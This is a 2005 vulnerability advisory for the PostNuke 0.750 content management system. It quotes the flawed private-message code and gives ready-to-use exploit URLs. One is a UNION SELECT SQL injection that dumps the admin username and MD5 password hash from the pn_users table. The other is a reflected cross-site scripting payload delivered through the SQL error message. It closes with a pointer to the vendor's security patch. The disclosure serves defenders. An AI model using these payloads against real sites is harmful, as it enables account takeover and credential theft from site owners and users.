PostNuke0750.txt

`  
  
-=[ Critical SQL injection and XSS in PostNuke ]=-  
  
Author: sp3x  
Date: 27. May 2005  
  
Affected software :  
===================  
PostNuke version : x=> 0.750  
  
Description :  
=============  
PostNuke is an open source, open developement content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
Vulnerabilities :  
*****************  
  
Critical SQL injection :  
========================  
  
Code :  
------  
  
/modules/Messages/readpmsg.php  
  
=======================  
$sql = "SELECT $column[msg_id] AS \"msg_id\",  
$column[msg_image] AS \"msg_image\",  
$column[subject] AS \"subject\",  
$column[from_userid] AS \"from_userid\",  
$column[to_userid] AS \"to_userid\",  
$column[msg_time] AS \"msg_time\",  
$column[msg_text] AS \"msg_text\",  
$column[read_msg] AS \"read_msg\"  
FROM $pntable[priv_msgs]  
WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";  
  
$resultID =& $dbconn->SelectLimit($sql,1,$start);  
if($dbconn->ErrorNo()<>0) {  
error_log("DB Error: " . $dbconn->ErrorMsg());  
echo $dbconn->ErrorMsg() . "<br />";  
forumerror(0005);  
}  
=======================  
  
First lets login -in as user in postnuke. Then send the message to yourself.  
After that go to :  
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1  
  
Note :  
------  
total_messages=1 - the id of total_messages must exist  
  
Now you will see this error message   
  
error message :  
---------------  
========================  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL injection],1' at line 10  
========================  
  
Exploit SQL injection :  
=======================  
  
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1  
  
And we can see the admin md5 password and nick :)  
  
Cross-site scripting - XSS :  
============================  
  
Thanks to error message we can also perform XSS attacks :)  
  
Example :  
---------  
  
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1  
  
And we get :  
  
error message :  
---------------  
========================  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''[Our XSS],1' at line 10  
========================  
  
How to fix :  
============  
  
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
  
Greets :  
========  
  
cXIb8O3 and pkw :)  
  
Contact :  
=========  
  
sp3x[at]securityreason[dot].com  
www.securityreason.com  
`